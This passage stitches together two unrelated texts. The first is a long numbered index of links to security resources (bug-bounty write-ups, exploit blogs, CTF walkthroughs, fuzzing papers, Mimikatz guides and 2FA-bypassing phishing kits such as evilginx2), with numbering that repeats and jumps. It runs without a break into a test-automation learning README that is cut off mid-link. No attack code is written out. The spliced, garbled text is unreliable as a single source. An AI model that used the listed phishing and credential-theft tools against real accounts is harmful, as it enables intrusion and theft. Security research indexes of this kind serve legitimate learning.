https://medium.com/@04sabsas/bugbounty-writeup-creative-thinking-is-our-everything-race-condition-business-logic-error-2f3e82b9aa17 -2139-Chaining improper authorization to Race condition to harvest credit card details: https://medium.com/@ciph3r7r0ll/chaining-improper-authorization-to-race-condition-to-harvest-credit-card-details-a-bug-bounty-effe6e0f5076 -2140-Google APIs Clickjacking worth 1337$: https://medium.com/@godofdarkness.msf/google-apis-clickjacking-1337-7a3a9f3eb8df -2141-Bypass CSRF with clickjacking on Google org: https://medium.com/@saadahmedx/bypass-csrf-with-clickjacking-worth-1250-6c70cc263f40 -2142-2FA Bypass via logical rate limiting Bypass: https://medium.com/@jeppe.b.weikop/2fa-bypass-via-logical-rate-limiting-bypass-25ae2a4e1835 -2143-OTP bruteforce account takeover: https://medium.com/@ranjitsinghnit/otp-bruteforce-account-takeover-faaac3d712a8 -2144-Microsoft RCE bugbounty: https://blog.securitybreached.org/2020/03/31/microsoft-rce-bugbounty/ -2145-Bug Bounty Tips #1: https://www.infosecmatter.com/bug-bounty-tips-1/ -2146-Bug Bounty Tips #2: https://www.infosecmatter.com/bug-bounty-tips-2-jun-30/ -2147-Bug Bounty Tips #3: https://www.infosecmatter.com/bug-bounty-tips-3-jul-21/ -2148-Bug Bounty Tips #4: https://www.infosecmatter.com/bug-bounty-tips-4-aug-03/ -2149-Bug Bounty Tips #5: https://www.infosecmatter.com/bug-bounty-tips-5-aug-17/ -2150-Bug Bounty Tips #6: https://www.infosecmatter.com/bug-bounty-tips-6-sep-07/ -2151-Finding Bugs in File Systems with an Extensible Fuzzing Framework ﴾TOS 2020﴿: https://wcventure.github.io/FuzzingPaper/Paper/TOS20_FileSys.pdf -2152-PeriScope: An Effective Probing and Fuzzing Framework for the Hardware‐OS Boundary ﴾NDSS2019﴿: https://wcventure.github.io/FuzzingPaper/Paper/NDSS19_PeriScope.pdf -2153-Bug Bounty Tips #7: https://www.infosecmatter.com/bug-bounty-tips-7-sep-27/ -2154-Fuzzing: Hack, Art, and Science ﴾CACM 2020﴿: https://wcventure.github.io/FuzzingPaper/Paper/CACM20_Fuzzing.pdf -2155-Azure File Shares for Pentesters: https://blog.netspi.com/azure-file-shares-for-pentesters/ -2156-XSS like a Pro: https://www.hackerinside.me/2019/12/xss-like-pro.html -2157-XSS on Cookie Pop-up Warning: https://vict0ni.me/bug-hunting-xss-on-cookie-popup-warning/ -2158-Effortlessly finding Cross Site Script Inclusion (XSSI) & JSONP for bug bounty: https://medium.com/bugbountywriteup/effortlessly-finding-cross-site-script-inclusion-xssi-jsonp-for-bug-bounty-38ae0b9e5c8a -2159-XSS in Zoho Mail: https://www.hackerinside.me/2019/09/xss-in-zoho-mail.html -2160-Overview Of Empire 3.4 Features: https://www.bc-security.org/post/overview-of-empire-3-4-features/ -2161-Android App Source code Extraction and Bypassing Root and SSL Pinning checks: https://vj0shii.info/android-app-testing-initial-steps/ -2162-The 3 Day Account Takeover: https://medium.com/@__mr_beast__/the-3-day-account-takeover-269b0075d526 -2163-A Review of Fuzzing Tools and Methods: https://wcventure.github.io/FuzzingPaper/Paper/2017_review.pdf -2164-PeriScope: An Effective Probing and Fuzzing Framework for the Hardware‐OS Boundary ﴾NDSS2019﴿: https://wcventure.github.io/FuzzingPaper/Paper/NDSS19_PeriScope.pdf -2165-Oneplus XSS vulnerability in customer support portal: https://medium.com/@tech96bot/oneplus-xss-vulnerability-in-customer-support-portal-d5887a7367f4 -2166-Windows-Privilege-Escalation-Resources: https://medium.com/@aswingovind/windows-privilege-escalation-resources-d35dca8444de -2167-Persistence – DLL Hijacking: https://pentestlab.blog/page/5/ -2168-Scanning JS Files for Endpoints and Secrets: https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/ -2169-Password Spraying Secure Logon for F5 Networks: https://www.n00py.io/2020/08/password-spraying-secure-logon-for-f5-networks/ -2170-Password Spraying Dell SonicWALL Virtual Office: https://www.n00py.io/2019/12/password-spraying-dell-sonicwall-virtual-office/ -2171-Attention to Details : Finding Hidden IDORs: https://medium.com/@aseem.shrey/attention-to-details-a-curious-case-of-multiple-idors-5a4417ba8848 -2172-Bypassing file upload filter by source code review in Bolt CMS: https://stazot.com/boltcms-file-upload-bypass/ -2173-HTB{ Giddy }: https://epi052.gitlab.io/notes-to-self/blog/2019-02-09-hack-the-box-giddy/ -2174-Analyzing WhatsApp Calls with Wireshark, radare2 and Frida: https://movaxbx.ru/2020/02/11/analyzing-whatsapp-calls-with-wireshark-radare2-and-frida/ -2175-2FA bypass via CSRF attack: https://medium.com/@vbharad/2-fa-bypass-via-csrf-attack-8f2f6a6e3871 -2176-CSRF token bypass [a tale of 2k bug]: https://medium.com/@sainttobs/csrf-token-bypasss-a-tale-of-my-2k-bug-ff7f51166ea1 -2177-Setting the ‘Referer’ Header Using JavaScript: https://www.trustedsec.com/blog/setting-the-referer-header-using-javascript/ -2178-Bug Bytes #91 - The shortest domain, Weird Facebook authentication bypass & GitHub Actions secrets: https://blog.intigriti.com/2020/10/07/bug-bytes-91-the-shortest-domain-weird-facebook-authentication-bypass-github-actions-secrets/ -2179-Stored XSS on Zendesk via Macro’s PART 2: https://medium.com/@hariharan21/stored-xss-on-zendesk-via-macros-part-2-676cefee4616 -2180-Azure Account Hijacking using mimikatz’s lsadump::setntlm: https://www.trustedsec.com/blog/azure-account-hijacking-using-mimikatzs-lsadumpsetntlm/ -2181-CORS misconfiguration account takeover out of scope to grab items in scope: https://medium.com/@mashoud1122/cors-misconfiguration-account-takeover-out-of-scope-to-grab-items-in-scope-66d9d18c7a46 -2182-Razzer: Finding Kernel Race Bugs through Fuzzing ﴾S&P 2019﴿: https://wcventure.github.io/FuzzingPaper/Paper/SP19_Razzer.pdf https://lifeasageek.github.io/papers/jeong-razzer-slides.pdf -2183-Facebook Bug bounty : How I was able to enumerate instagram accounts who had enabled 2FA: https://medium.com/@zk34911/facebook-bug-bounty-how-i-was-able-to-enumerate-instagram-accounts-who-had-enabled-2fa-two-step-fddba9e9741c -2184-Bypass hackerone 2FA: https://medium.com/japzdivino/bypass-hackerone-2fa-requirement-and-reporter-blacklist-46d7959f1ee5 -2185-How I abused 2FA to maintain persistence after password recovery change google microsoft instragram: https://medium.com/@lukeberner/how-i-abused-2fa-to-maintain-persistence-after-a-password-change-google-microsoft-instagram-7e3f455b71a1 -2186-How I hacked 40k user accounts of microsoft using 2FA bypass outlook: https://medium.com/@goyalvartul/how-i-hacked-40-000-user-accounts-of-microsoft-using-2fa-bypass-outlook-live-com-13258785ec2f -2187-How to bypass 2FA with a HTTP header: https://medium.com/@YumiSec/how-to-bypass-a-2fa-with-a-http-header-ce82f7927893 -2188-Building a custom Mimikatz binary: https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/ -2189-Self XSS to Good XSS: https://medium.com/@arbazhussain/self-xss-to-good-xss-clickjacking-6db43b44777e -2190-DOM based XSS or why you should not rely on cloudflare too much: https://medium.com/bugbountywriteup/dom-based-xss-or-why-you-should-not-rely-on-cloudflare-too-much-a1aa9f0ead7d -2191-Reading internal files using SSRF vulnerability: https://medium.com/@neerajedwards/reading-internal-files-using-ssrf-vulnerability-703c5706eefb -2192-Latest web hacking tools: https://portswigger.net/daily-swig/latest-web-hacking-tools-q3-2020 -2193-Cross-Site Scripting (XSS) Cheat Sheet - 2020 Edition: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet -2194-Hijacking a Domain Controller with Netlogon RPC (aka Zerologon: CVE-2020-1472): https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hijacking-a-domain-controller-with-netlogon-rpc-aka-zerologon-cve-2020-1472/ -2195-How I got 1200+ Open S3 buckets…!: https://medium.com/@mail4frnd.mohit/how-i-got-1200-open-s3-buckets-aec347ea2a1e -2196-Open Sesame: Escalating Open Redirect to RCE with Electron Code Review: https://spaceraccoon.dev/open-sesame-escalating-open-redirect-to-rce-with-electron-code-review -2197-When you browse Instagram and find former Australian Prime Minister Tony Abbott's passport number: https://mango.pdf.zone/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram -2198-HTB{ Vault }: https://epi052.gitlab.io/notes-to-self/blog/2018-11-04-hack-the-box-vault/ -2199-HTB{ ellingson }: https://epi052.gitlab.io/notes-to-self/blog/2019-09-29-hack-the-box-ellingson/ -2200-HTB{ Swagshop }: https://epi052.gitlab.io/notes-to-self/blog/2019-09-12-hack-the-box-swagshop/ -2201-Evading Firewalls with Tunnels: https://michiana-infosec.com/evading-firewalls-with-tunnels/ -2202-How to Geolocate Mobile Phones (or not): https://keyfindings.blog/2020/07/12/how-to-geolocate-mobile-phones-or-not/ -2203-Web application race conditions: It’s not just for binaries: https://blog.pucarasec.com/2020/07/06/web-application-race-conditions-its-not-just-for-binaries/ -2204-Two-Factor Authentication Bypass: https://gauravnarwani.com/two-factor-authentication-bypass/ -2205-Proxies, Pivots, and Tunnels – Oh My! : https://blog.secureideas.com/2020/10/proxies_pivots_tunnels.html -2206-Let's Debug Together: CVE-2020-9992: https://blog.zimperium.com/c0ntextomy-lets-debug-together-cve-2020-9992/ -2207-I Like to Move It: Windows Lateral Movement Part 3: DLL Hijacking: https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/ -2208-Abusing Chrome's XSS auditor to steal tokens: https://portswigger.net/research/abusing-chromes-xss-auditor-to-steal-tokens -2209-ModSecurity, Regular Expressions and Disputed CVE-2020-15598: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/modsecurity-regular-expressions-and-disputed-cve-2020-15598/ -2210-Bug Bounty Tips #8: https://www.infosecmatter.com/bug-bounty-tips-8-oct-14/ -2211-IOS Pentesing Guide From A N00bs Perspective: https://payatu.com/blog/abhilashnigam/ios-pentesing-guide-from-a-n00bs-perspective.1 -2212-Bug Bytes #92 - Pwning Apple for three months, XSS in VueJS, Hacking Salesforce Lightning & Unicode byͥtes: https://blog.intigriti.com/2020/10/14/bug-bytes-92-pwning-apple-for-three-months-xss-in-vuejs-hacking-salesforce-lightning-unicode-by%cd%a5tes/ -2213-We Hacked Apple for 3 Months: Here’s What We Found: https://samcurry.net/hacking-apple/ -2214-Breaking JCaptcha using Tensorflow and AOCR: https://www.gremwell.com/breaking-jcaptcha-tensorflow-aocr -2215-Bug Bytes #82 - Timeless timing attacks, Grafana SSRF, Pizza & Youtube delicacie: https://blog.intigriti.com/2020/08/05/bug-bytes-82-timeless-timing-attacks-grafana-ssrf-pizza-youtube-delicacies/ -2216-Bug Bytes #71 – 20K Facebook XSS, LevelUp 0x06 &Naffy’s Notes: https://blog.intigriti.com/2020/05/20/bug-bytes-71-20k-facebook-xss-levelup-0x06-naffys-notes/ -2217-Bug Bytes #90 - The impossible XSS, Burp Pro tips & A millionaire on bug bounty and meditation: https://blog.intigriti.com/2020/09/30/bug-bytes-90-the-impossible-xss-burp-pro-tips-a-millionaire-on-bug-bounty-and-meditation/ -2218-How to Find Vulnerabilities in Code: Bad Words: https://btlr.dev/blog/how-to-find-vulnerabilities-in-code-bad-words -2219-Testing for WebSockets security vulnerabilities: https://portswigger.net/web-security/websockets -2220-Practical Web Cache Poisoning: https://portswigger.net/research/practical-web-cache-poisoning -2221-htb{ zipper }: https://epi052.gitlab.io/notes-to-self/blog/2018-10-22-hack-the-box-zipper/ -2222-What is HTTP request smuggling? Tutorial & Examples: https://portswigger.net/web-security/request-smuggling -2223-When alert fails: exploiting transient events: https://portswigger.net/research/when-alert-fails-exploiting-transient-events -2224-BugPoC LFI Challeng: https://hipotermia.pw/bb/bugpoc-lfi-challenge -2225-Misc CTF - Request Smuggling: https://hg8.sh/posts/misc-ctf/request-smuggling/ -2226-403 to RCE in XAMPP: https://www.securifera.com/blog/2020/10/13/403-to-rce-in-xampp/ -2227-Phone numbers investigation, the open source way: https://www.secjuice.com/phone-numbers-investigation-the-open-source-way/ -2228-Covert Web Shells in .NET with Read-Only Web Paths: https://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/ -2229-From Static Analysis to RCE: https://blog.dixitaditya.com/from-android-app-to-rce/ -2230-GitHub Pages - Multiple RCEs via insecure Kramdown configuration - $25,000 Bounty: https://devcraft.io/2020/10/20/github-pages-multiple-rces-via-kramdown-config.html -2231-Signed Binary Proxy Execution via PyCharm: https://www.archcloudlabs.com/projects/signed_binary_proxy_execution/ -2232-Bug Bytes #93 - Discord RCE, Vulnerable HTML to PDF converters & DOMPurify bypass demystified : https://blog.intigriti.com/2020/10/21/bug-bytes-93-discord-rce-vulnerable-html-to-pdf-converters-dompurify-bypass-demystified/ -2233-Bug Bytes #94 - Breaking Symfony apps, Why Cyber Security is so hard to learn & how best to approach it: https://blog.intigriti.com/2020/10/28/bug-bytes-94-breaking-symfony-apps-why-cyber-security-is-so-hard-to-learn-how-best-to-approach-it/ -2234-Advanced Level Resources For Web Application Penetration Testing: https://twelvesec.com/2020/10/19/advanced-level-resources-for-web-application-penetration-testing/ -2235-Pass-the-hash wifi: https://sensepost.com/blog/2020/pass-the-hash-wifi/ -2236-HTML to PDF converters, can I hack them?: https://sidechannel.tempestsi.com/html-to-pdf-converters-can-i-hack-them-a681cfee0903 -2237-Android adb reverse tethering mitm setup: https://www.securify.nl/blog/android-adb-reverse-tethering-mitm-setup/ -2238-Typical Wi-Fi attacks: https://splone.com/blog/2020/10/13/typical-wi-fi-attacks/ -2239-Burp suite “ninja moves”: https://owasp.org/www-chapter-norway/assets/files/Burp%20suite%20ninja%20moves.pdf -2240-Razzer: Finding Kernel Race Bugs through Fuzzing ﴾S&P 2019﴿: Paper:https://wcventure.github.io/FuzzingPaper/Paper/SP19_Razzer.pdf Code:https://github.com/compsec-snu/razzer Slides:https://lifeasageek.github.io/papers/jeong-razzer-slides.pdf -2241-MoonShine: Optimizing OS Fuzzer Seed Selection with Trace Distillation ﴾USENIX Security2018﴿: Paper:https://wcventure.github.io/FuzzingPaper/Paper/USENIX18_MoonShine.pdf -2242-Sequence directed hybrid fuzzing ﴾SANER 2020﴿: Paper:https://wcventure.github.io/FuzzingPaper/Paper/SANER20_Sequence.pdf -2243-Open Source Intelligence Tools And Resources Handbook 2020: https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf -2244-How to Find IP Addresses Owned by a Company: https://securitytrails.com/blog/identify-ip-ranges-company-owns -2245-What is Banner Grabbing? Best Tools and Techniques Explained: https://securitytrails.com/blog/banner-grabbing -2246-Recon Methods Part 4 – Automated OSINT: https://www.redsiege.com/blog/2020/04/recon-methods-part-4-automated-osint/ -2247-Forcing Firefox to Execute XSS Payloads during 302 Redirects: https://www.gremwell.com/firefox-xss-302 -2248-HTB{ Frolic }: https://epi052.gitlab.io/notes-to-self/blog/2018-10-22-hack-the-box-frolic/ -2249-Identifying Vulnerabilities in SSL/TLS and Attacking them: https://medium.com/bugbountywriteup/identifying-vulnerabilities-in-ssl-tls-and-attacking-them-e7487877619a -2250-My First Bug Bounty Reward: https://medium.com/bugbountywriteup/my-first-bug-bounty-reward-8fd133788407 -2251-2FA Bypass On Instagram Through A Vulnerable Endpoint: https://medium.com/bugbountywriteup/2fa-bypass-on-instagram-through-a-vulnerable-endpoint-b092498af178 -2252-Automating XSS using Dalfox, GF and Waybackurls: https://medium.com/bugbountywriteup/automating-xss-using-dalfox-gf-and-waybackurls-bc6de16a5c75 -2253-Think Outside the Scope: Advanced CORS Exploitation Techniques: https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397 -2254-Intro to CTFs. Resources, advice and everything else: https://medium.com/bugbountywriteup/intro-to-ctfs-164a03fb9e60 -2255-PowerShell Commands for Pentesters: https://www.infosecmatter.com/powershell-commands-for-pentesters/ -2256-31k$ SSRF in Google Cloud Monitoring led to metadata exposure: https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html -2257-NAT Slipstreaming: https://samy.pl/slipstream/ -2258-How i got 7000$ in Bug-Bounty for my Critical Finding: https://medium.com/@noobieboy1337/how-i-got-7000-in-bug-bounty-for-my-critical-finding-99326d2cc1ce -2259-SQL Injection Payload List: https://medium.com/@ismailtasdelen/sql-injection-payload-list-b97656cfd66b -2260-Taking over multiple user accounts: https://medium.com/bugbountywriteup/chaining-password-reset-link-poisoning-idor-account-information-leakage-to-achieve-account-bb5e0e400745 -2261-Bug Bytes #98 - Imagemagick's comeback, Treasure trove of wordlists, Advent of Cyber & How to get more hours in your day: https://blog.intigriti.com/2020/11/25/bug-bytes-98-imagemagicks-comeback-treasure-trove-of-wordlists-advent-of-cyber-how-to-get-more-hours-in-your-day/ -2262-How to get root on Ubuntu 20.04 by pretending nobody’s /home: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE -2263-What is Shodan? Diving into the Google of IoT Devices: https://securitytrails.com/blog/what-is-shodan -2264-Purgalicious VBA: Macro Obfuscation With VBA Purging & OfficePurge: https://www.fireeye.com/blog/threat-research/2020/11/purgalicious-vba-macro-obfuscation-with-vba-purging.html https://github.com/fireeye/OfficePurge -2265-Dynamic Invocation in .NET to bypass hooks: https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/ -2266-NepHack Online CTF June 2020 Write-up: https://www.askbuddie.com/blog/nephack-online-ctf-june-2020-write-up/ -2268-Attacking SCADA Part II:: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacking-scada-part-ii-vulnerabilities-in-schneider-electric-ecostruxure-machine-expert-and-m221-plc/ -2269-PENTESTING CHEATSHEET: https://hausec.com/pentesting-cheatsheet -2270-CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability: http://blog.pi3.com.pl/?p=780 -2271-TShark Cheatsheet: https://snippets.bentasker.co.uk/page-1909131238-TShark-Cheatsheet-BASH.html -2272-Exploiting a “Simple” Vulnerability – In 35 Easy Steps or Less!: https://windows-internals.com/exploiting-a-simple-vulnerability-in-35-easy-steps-or-less/ -2273-Exploiting CVE-2020-0041 - Part 1: Escaping the Chrome Sandbox: https://labs.bluefrostsecurity.de/blog/2020/03/31/cve-2020-0041-part-1-sandbox-escape/ -2274-Exploiting CVE-2020-0041 - Part 2: Escalating to root: https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/ -2275-Exploiting MS16-145: MS Edge TypedArray.sort Use-After-Free (CVE-2016-7288): https://blog.quarkslab.com/exploiting-ms16-145-ms-edge-typedarraysort-use-after-free-cve-2016-7288.html -2276-Bug Bytes #99 – Bypassing bots and WAFs,JQ in Burp & Smarter JSON fuzzing and subdomain takeovers: https://blog.intigriti.com/2020/12/02/bug-bytes-99-bypassing-bots-and-wafs-jq-in-burp-smarter-json-fuzzing-and-subdomain-takeovers/ -2277-Digging secrets from git repositories by using truffleHog: https://redblueteam.wordpress.com/2020/01/04/digging-secrets-from-git-repositories-by-using-trufflehog -2287-Apple Safari Pwn2Own 2018 Whitepaper: https://labs.f-secure.com/assets/BlogFiles/apple-safari-pwn2own-vuln-write-up-2018-10-29-final.pdf -2288-DISSECTING APT21 SAMPLES USING A STEP-BY-STEP APPROACH: https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/ -2289-MITRE ATT&CK T1082 System Information Discovery: https://www.picussecurity.com/resource/attck-t1082-system-information-discovery -2290-A simple and fast Wireshark tutorial: https://andregodinho1.medium.com/a-simple-and-fast-wireshark-tutorial-7d2b78a71820 -2291-Recon - My Way Or High Way: https://shahjerry33.medium.com/recon-my-way-or-high-way-58a18dab5c95 -2292-Finding bugs at limited scope programs (Single Domain Websites): https://dewcode.medium.com/finding-bugs-at-limited-scopes-programs-single-domain-websites-d3c2ff396edf -2293-Passive intelligence gathering techniques: https://medium.com/@agent_maximus/passive-intelligence-gathering-techniques-uncover-domains-subdomains-ip-addresses-a40f51ee0eb0 -2294-Android Pen-testing/Hunting 101: https://medium.com/@noobieboy1337/android-pen-testing-hunting-101-dc0fecf90682 -2295-All MITM attacks in one place: https://github.com/Sab0tag3d/MITM-cheatsheet -2296-From Recon to Optimizing RCE Results: https://medium.com/bugbountywriteup/from-recon-to-optimizing-rce-results-simple-story-with-one-of-the-biggest-ict-company-in-the-ea710bca487a -2297-RCE on https://beta-partners.tesla.com due to CVE-2020-0618: https://bugcrowd.com/disclosures/d23e05b1-c4cc-440a-a678-d8045468c902/rce-on-https-beta-partners-tesla-com-due-to-cve-2020-0618 -2298-Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641: https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-1.html -2299-Remote iPhone Exploitation Part 2: Bringing Light into the Darkness -- a Remote ASLR Bypass: https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-2.html -2300-Remote iPhone Exploitation Part 3: From Memory Corruption to JavaScript and Back -- Gaining Code Execution: https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-3.html -2301-1000$ for Open redirect via unknown technique [BugBounty writeup]: https://ruvlol.medium.com/1000-for-open-redirect-via-unknown-technique-675f5815e38a -2302-Facebook SSRF: https://medium.com/@amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5 -2303-Metasploit Tips and Tricks for HaXmas 2020: https://blog.rapid7.com/2020/12/23/metasploit-tips-and-tricks-for-haxmas-2020-2/ -2304-SubDomain TakeOver ~ Easy WIN WIN: https://amitp200.medium.com/subdomain-takeover-easy-win-win-6034bb4147f3 -2305-Recon Methodology : https://github.com/Quikko/Recon-Methodology -2306-h1-212 CTF Writeup: https://gist.github.com/Corb3nik/aeb7c762bd4fec36436a0b5686651e69 -2307-exploiting-second-order-blind-sql-injection: https://medium.com/bugbountywriteup/exploiting-second-order-blind-sql-injection-689e98f04daa -2308-hunting-on-the-go-install-nethunter-on-unsupported-devices: https://medium.com/bugbountywriteup/hunting-on-the-go-install-nethunter-on-unsupported-devices-dd01a4f30b6a -2309-$10,000 for a vulnerability that doesn’t exist: https://medium.com/@valeriyshevchenko/10-000-for-a-vulnerability-that-doesnt-exist-9dbc63684e94 -2310-Finding bugs on Chess.com: https://medium.com/bugbountywriteup/finding-bugs-on-chess-com-739a71fbdb31 -2311-Each and every request make sense: https://akshartank.medium.com/each-and-every-request-make-sense-4572b3205382 -2312-Exploiting Max. Character Limitation: https://orthonviper.medium.com/exploiting-max-character-limitation-cde982545019 -2313-API based IDOR to leaking Private IP address of 6000 businesses: https://rafi-ahamed.medium.com/api-based-idor-to-leaking-private-ip-address-of-6000-businesses-6bc085ac6a6f -2314-Facebook bug Bounty -Finding the hidden members of the Vivek ps private events: https://vivekps143.medium.com/facebook-bug-bounty-finding-the-hidden-members-of-the-private-events-977dc1784ff9 -2315-IoT Vulnerability Assessment of the Irish IP Address Space: https://f5.com/labs/articles/threat-intelligence/iot-vulnerability-assessment-of-the-irish-ip-address-space -2316-Facebook bug bounty (500 USD) :A blocked fundraiser organizer would be unable to view or remove themselves from the fundraiser https://medium.com/bugbountywriteup/facebook-bug-bounty-500-usd-a-blocked-fundraiser-organizer-would-be-unable-to-view-or-remove-5da9f86d2fa0 -2317-This is how I was able to view anyone’s private email and birthday on Instagram: https://saugatpokharel.medium.com/this-is-how-i-was-able-to-view-anyones-private-email-and-birthday-on-instagram-1469f44b842b -2138-My Bug Bounty Journey and My First Critical Bug — Time Based Blind SQL Injection: https://marxchryz.medium.com/my-bug-bounty-journey-and-my-first-critical-bug-time-based-blind-sql-injection-aa91d8276e41 -2139-JavaScript analysis leading to Admin portal access: https://rikeshbaniyaaa.medium.com/javascript-analysis-leading-to-admin-portal-access-ea30f8328c8e -2140-SCADA hacker's toolset: https://scadahacker.com/tools.html -2141-red team phishing: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki#phishing-setup -2142-Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 -2143-Stored XSS in icloud.com: https://vbharad.medium.com/stored-xss-in-icloud-com-5000-998b8c4b2075 -2144-20 Common Tools & Techniques Used by macOS Threat Actors & Malware: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ -2145-Error-Based SQL Injection on a WordPress website and extract more than 150k user details: https://ynoof.medium.com/error-based-sql-injection-on-a-wordpress-website-and-extract-more-than-150k-user-details-f65f987c2cc0 -2146-Scope Based Recon Methodology: Exploring Tactics for Smart Recon: https://blog.cobalt.io/scope-based-recon-smart-recon-tactics-7e72d590eae5 -2147-Hail Frida!! The Universal SSL pinning bypass for Android applications: https://medium.com/@ved_wayal/hail-frida-the-universal-ssl-pinning-bypass-for-android-e9e1d733d29 -2148-Common Tools & Techniques Used By Threat Actors and Malware — Part I : https://infosecwriteups.com/common-tools-techniques-used-by-threat-actors-and-malware-part-i-deb05b664879 -2149-Common Tools & Techniques Used By Threat Actors and Malware — Part II: https://nasbench.medium.com/common-tools-techniques-used-by-threat-actors-and-malware-part-ii-c2e65cd6b084 -2150-Tools designed to automate phishing attacks that are intended to bypass 2FA: evilginx2: https://lnkd.in/emMu_mN Modlishka: https://lnkd.in/gvGc-kZ KoiPhish: https://lnkd.in/dwzavJr ReelPhish https://lnkd.in/gjs_aC8 CredSniper:https://lnkd.in/g-jzK4y Muraena:https://lnkd.in/d2M53cs -2151-Digital Forensic Tools https://github.com/ivbeg/awesome-forensicstools/ -2152-Netcat Cheat Sheet: https://www.linkedin.com/posts/ammaramer_netcat-cheat-sheet-1-banner-grabbing-activity-6780201567527165953-bEbb -2153-Web App Hacking Methodology: https://twitter.com/cry__pto/status/1374625813404999686 -2154-Penetration Testing MindMap: https://twitter.com/cry__pto/status/1375170618501562368 -2155-Hacking Concept and Fundamentals: https://twitter.com/cry__pto/status/1376615352466046976 -2156-Social Media Osint Tools: https://twitter.com/cry__pto/status/1382323944833875970
![Open Source Love](https://badges.frapsoft.com/os/v1/open-source.svg?v=103) # Awesome Learning <div align="center"> <img src="assets/poster.gif" width="500" height="300"/> </div> I have been into Software Testing role since last 14+ years, however I must tell you that my most of the time was spent in manual testing the applications. When I got into this role, specifically it was the time when there used to be a lot of desktop applications. I started my career in 2008, being a Commerce graduate and not knowing the basic alphabets of engineering, initially it was very difficult to understand what programming, testing, releases was all about! Thanks to all my mentors and guides, they helped me a lot to understand those basic concepts about testing and how the actual process works. I have been asked by many about my career transformation journey from Manual Testing to a Test Automation Engineer, hence I thought of creating this repository which has the learning path I followed to become a Test Automation Engineer. ## Don't forget to give a :star: to make the project popular - Check out links to my LinkedIn Profile, Medium blogs and other social media sites on [LinkTree](https://linktr.ee/faisalkhatri) # Roadmaps - [QA Roadmap by Anas Fitiani](https://github.com/fityanos/awesome-quality-assurance-roadmap) - [DevOps Roadmap by Milan Milanovic](https://github.com/milanm/DevOps-Roadmap) - [Threat Modelling Roadmap by Hysn Technologies Inc](https://github.com/hysnsec/awesome-threat-modelling) # Programming languages <details> <summary>Java</summary> - [Java Programming Course by Angie Jones](https://testautomationu.applitools.com/java-programming-course/) - [Beginners Book - Java Tutorials](https://beginnersbook.com/java-tutorial-for-beginners-with-examples/) - [Learn Java Online](https://www.learnjavaonline.org/) - [Learn Java - Codecademy](https://www.codecademy.com/learn/learn-java) - [Java Best Practices](https://github.com/in28minutes/java-best-practices) - [Java problems for practice - w3resources](https://www.w3resource.com/java-exercises/) - [Java Problems for practice - Codingbat](https://codingbat.com/java) - [Java Programming examples - Geeks for Geeks](https://www.geeksforgeeks.org/java-programming-examples/) - [Java Programming examples - Programiz](https://www.programiz.com/java-programming/examples) - [Java Programming examples - CodeAbbey](https://www.codeabbey.com/) - [CodeGym](https://codegym.cc/) - [SoloLearn](https://www.sololearn.com/learn/courses/java-introduction) - [Java Design Patterns - Refactoring Guru](https://refactoring.guru/design-patterns) - [Java Design Patterns - Github](https://github.com/iluwatar/java-design-patterns) - [Introduction to Computer Science using Java](https://chortle.ccsu.edu/Java5/index.html#10) - [W3Schools](https://www.w3schools.com/java/) - [Head First Design Patterns](https://www.oreilly.com/library/view/head-first-design/0596007124/) - [Clean Code](https://www.oreilly.com/library/view/clean-code-a/9780136083238/) - [Refactoring](https://refactoring.guru/refactoring) </details> <details> <summary>JavaScript</summary> - [Beginners Series to JavaScript](https://learn.microsoft.com/en-us/shows/beginners-series-to-javascript/) - [FreeCodeCamp.org](https://www.freecodecamp.org/news/learn-javascript-free-js-courses-for-beginners/) - [learn-js](https://www.learn-js.org/) - [Javascript.info](https://javascript.info/) - [JavaScript Tutorial on Test Automation University](https://testautomationu.applitools.com/javascript-tutorial/) - [Javascript.com](https://www.javascript.com/try) - [W3Schools](https://www.w3schools.com/js/) - [Eloquent JavaScript](https://eloquentjavascript.net/) - [Full Stack Academy](https://www.fullstackacademy.com/blog/learn-javascript-for-free-13-online-tutorials-resources) </details> <details> <summary>TypeScript</summary> - [Learn TypeScript from Scratch](https://www.typescriptlang.org/docs/handbook/typescript-from-scratch.html) - [TypeScript Course for Beginners](https://www.youtube.com/watch?v=BwuLxPH8IDs) - [Learn TypeScript - The Ultimate Beginners Guide](https://www.freecodecamp.org/news/learn-typescript-beginners-guide/) - [TypeScript Cash Course with Matt Pocock](https://learn.microsoft.com/en-us/shows/vs-code-livestreams/typescript-crash-course-with-matt-pocock) - [TypeScript Tutorial](https://www.typescripttutorial.net/) - [LearnTypeScript.dev](https://learntypescript.dev/) - [TypeScriptLang.org](https://www.typescriptlang.org/) - [TotalTypeScript](https://www.totaltypescript.com/tutorials) - [TypeScript Full Tutorial by The Net Ninja](https://www.youtube.com/playlist?list=PL4cUxeGkcC9gUgr39Q_yD6v-bSyMwKPUI) - [TypeScript Beginner's Course by Sam Pigott](https://dev.to/sam_piggott/full-typescript-beginner-s-course-free-22mg) - [TypeScript Online 